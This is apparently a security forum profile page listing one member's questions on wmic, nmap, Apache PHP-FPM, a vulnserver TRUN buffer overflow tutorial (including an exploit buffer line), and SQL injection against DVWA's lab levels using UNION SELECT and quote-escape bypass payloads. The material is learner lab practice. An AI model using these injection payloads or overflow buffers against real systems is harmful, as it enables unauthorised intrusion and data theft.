Jump to content

w01f

Active Members
  • Posts

    11
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

w01f's Achievements

  1. Here is standard wmic output with cmd or powershell The output of wmic can be redirected using as follows from cmd or powershell: C:\tmp>wmic /output:out.txt printer list status C:\tmp> My question: Let say cmd and powershell is not available (blocked due to security purpose), is it possible to perform similar redirection from the wmic itself (not from cmd or powershell)?
  2. Is it possible to save the output of UDP scan (-sU) in the three major formats at once? I don't have any issue with TCP scan. $ nmap scanme.nmap.org -oA tcp Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for scanme.nmap.org (45.33.32.156) Host is up (0.19s latency). Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe00:bb2f Not shown: 995 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 9929/tcp open nping-echo 31337/tcp open Elite Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds $ However, it doesn't work well with UDP scan $ nmap -sU scanme.nmap.org -oA udp You requested a scan type which requires root privileges. QUITTING! $ $ sudo nmap -sU scanme.nmap.org -oA udp Failed to open normal output file udp.nmap for writing QUITTING! $ $ ls -lh total 16K -rw-rw-r-- 1 wolf wolf 441 Jul 6 00:20 tcp.gnmap -rw-rw-r-- 1 wolf wolf 541 Jul 6 00:20 tcp.nmap -rw-rw-r-- 1 wolf wolf 5.9K Jul 6 00:20 tcp.xml $ The only output files generated was for TCP scan. What about UDP scan? Is it possible to use -sU with -oA?
  3. I've just installed Apache with PHP-FPM based on the following tutorial How to Setup Apache with PHP-FPM on Ubuntu 20.04 wolf@linux:~$ dpkg -l apache2 libapache2-mod-fcgid software-properties-common php7.4 php7.4-fpm Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-=============================-===================-===================-=============================================================== ii apache2 2.4.29-1ubuntu4.14 amd64 Apache HTTP Server ii libapache2-mod-fcgid 1:2.3.9-1 amd64 FastCGI interface module for Apache 2 ii php7.4 7.4.12-3+ubuntu18.0 all server-side, HTML-embedded scripting language (metapackage) ii php7.4-fpm 7.4.12-3+ubuntu18.0 amd64 server-side, HTML-embedded scripting language (FPM-CGI binary) ii software-properties-common 0.96.24.32.14 all manage the repositories that you install software from (common) wolf@linux:~$ Test PHP with phpinfo() function wolf@linux:/var/www/html$ cat info.php <?php phpinfo(); ?> wolf@linux:/var/www/html$ The only issue right now is PHP file seems to be processed properly in CLI, but not via web browser. wolf@linux:/var/www/html$ php info.php | head phpinfo() PHP Version => 7.4.12 System => Linux 4.15.0-122-generic #124-Ubuntu SMP Thu Oct 15 13:03:05 UTC 2020 x86_64 Build Date => Oct 31 2020 17:04:09 Server API => Command Line Interface Virtual Directory Support => disabled Configuration File (php.ini) Path => /etc/php/7.4/cli Loaded Configuration File => /etc/php/7.4/cli/php.ini Scan this dir for additional .ini files => /etc/php/7.4/cli/conf.d wolf@linux:/var/www/html$ Unfortunately, it's not working on web browser What wrong in this case and what should I do to troubleshoot it?
  4. This tutorial shows how to find a JMP ESP in nttdll.dll http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ Find address for EIP In this step we have to check the registers and the stack. We have to find a way to jump to our buffer to execute our code. ESP points to the beginning of the C part of our buffer. We have to find a JMP ESP or CALL ESP instruction. Do not forget, that the address must not contain bad characters! Open the executable modules list in OllyDbg (press the E letter on the toolbar). Select a module, for example the ntdll.dll. (Vulnserv would not be a good choice as its address contains zero!) Press right click on the code and select Search for/All commands. Enter JMP ESP. A couple of possible address is displayed. Select one. I've followed the steps but still couldn't find JMP ESP instruction in nttdll.dll. JMP ESP is not there
  5. Ah, I got it now. Thanks for helping as always. It doesn't matter as that's the number of C char which if after the actual EIP address found. "C" * (5060 - 2003 - 4) Any number would do right? E.g. "C" * 8 buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + "C" * 8
  6. https://github.com/stephenbradshaw/vulnserver In this tutorial, sh3llc0d3r created 5040 bytes data using Metasploit pattern_create.rb. http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ /usr/share/metasploit-framework/tools/pattern_create.rb 5040 But in the following Python script, he/she using 5060 instead of 5040. buffer = "TRUN /.:/" + "A" * 2003 + "\x42\x42\x42\x42" + "C" * (5060 - 2003 - 4) What happens to the other additional 20 bytes of data? Where did it come from?
  7. How do I modify the original post? I can't find "Edit" button in this page. Thanks
  8. I'll use DVWA in this example as the code is available for everyone. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. You can get it here and set it up on your personal lab http://www.dvwa.co.uk/ Now I know that it's not possible to use tick/quote in SQL Injection Medium Level due to "mysql_real_escape_string()" PHP function. mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. https://www.php.net/manual/en/function.mysql-real-escape-string.php That's fine. I solved the Medium solution without using quote. It's easy because the number of data in DVWA is limited. But what happens when there's bigger data? Let me give an example. I was able to enumerate ALL columns name from current database. The problem is I wanted to get only column from table "users". As you can see, the following command actually list out all columns from ALL tables including "users" and also "guestbook" 1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE()-- - This is how it looks like when I selecting "table_schema,table_name,column_name" in MySQL. mysql> SELECT table_schema,table_name,column_name FROM information_schema.columns WHERE table_schema=DATABASE(); +--------------+------------+-------------+ | table_schema | table_name | column_name | +--------------+------------+-------------+ | dvwa | guestbook | comment_id | | dvwa | guestbook | comment | | dvwa | guestbook | name | | dvwa | users | user_id | | dvwa | users | first_name | | dvwa | users | last_name | | dvwa | users | user | | dvwa | users | password | | dvwa | users | avatar | +--------------+------------+-------------+ 9 rows in set (0.00 sec) The only solution that I can think of at the moment is by limiting the output only for "users" table by using MySQL WHERE and AND clause. However, tick is not allowed by "mysql_real_escape_string" function and this code will cause an error. 1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='users'-- - Error (which expected because of quote) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\'-- -' at line 1 Is there a way to get around this? How do I use tick when it's not possible?
  9. I really appreciate your invaluable response and feedback. Learned a lot just by reading the tips given. I notice that every time ' is used in medium level, it has been escaped with \ Code ' Error ... near '\'' at line 1 Code ' OR 1=1 -- - Error ... near '\' OR 1=1 -- -' at line 1 ' OR '1'='1' -- - Error ... near '\' OR \'1\'=\'1\' -- -' at line 1 I've looked at the source found and found that this was caused by PHP function which is "mysql_real_escape_string" in attempt to mitigate SQLi. Medium level code: protected by "mysql_real_escape_string" $id = $_GET['id']; $id = mysql_real_escape_string($id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; While in low level, there is no protection at all. So, it's easy to break the query, manipulate it, and disable rest of the query with comment. $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; First question has been answered, I've more. I'll be back for more question :) So I guess for this kind of environment, I've to tested more and observe the error message clearly as every singe error tells different story. The important part is to "use the error to visualize the statement being used". Thanks again for the invaluable tips.
  10. Thanks for your response. Btw, this problem has been solved by try and error. Tick is not even required in Medium level. I was wondering how to determine if tick is needed or not in the injection? Initially, I thought it was required for string, and not for integer based on this presentation in Def Con (refer to slide 23). https://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf Apparently DVWA shows that it's not accurate to determine if tick is required based on integer/string based Injection. Without tick 1 ORDER BY 10 -- - Low ID: 1 ORDER BY 10 -- - First name: admin Surname: admin Medium Unknown column '10' in 'order clause' With tick 1' ORDER BY 10 -- - Low Unknown column '10' in 'order clause' Medium You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY 10 -- -' at line 1
  11. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. You can get it here and set it up on your personal lab http://www.dvwa.co.uk/ As usual, ' is used to test for SQLi vulnerabilities DVWA Low Level Security DVWA Medium Level Security Both are vulnerable to SQLi, but error message from these 2 levels are different So, I tried it with and it works for Low level But not on Medium level I notice that everytime ' is used on Medium level, it will be escaped with \ Then, I decided to use different trick to bypass this which is %27. 27 is a single quote ' value in hex. ' is replaced with %27 so it becomes Unfortunately, this trick won't work on Low Level (no error at all), and here is the error on Medium level. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY 10 -- -' at line 1 Since this is GET request, so the request can be seen on address bar. Interesting, %27 has been encoded by the browser again so it becomes %2527. 25 is a hex value for % So this won't work. I've no idea at the moment, so I googled more and found trick to use unhex() function. With this, I was able to use ORDER BY function. But this only work on Medium, not Low level I thought the problem was solved. But when I try to use it with different SQL syntax such as table_schema='dvwa', I'm getting the same error which is expected. Error Since unhex() trick worked before, I thought it was working on this too. Error Little that I know .... I need to seperate the second unhex(27) function with database name which is dvwa. Else, SQL will read it as "dvwaunhex(27)-- -" I'm stuck here. How do I solve this problem?
×
×
  • Create New...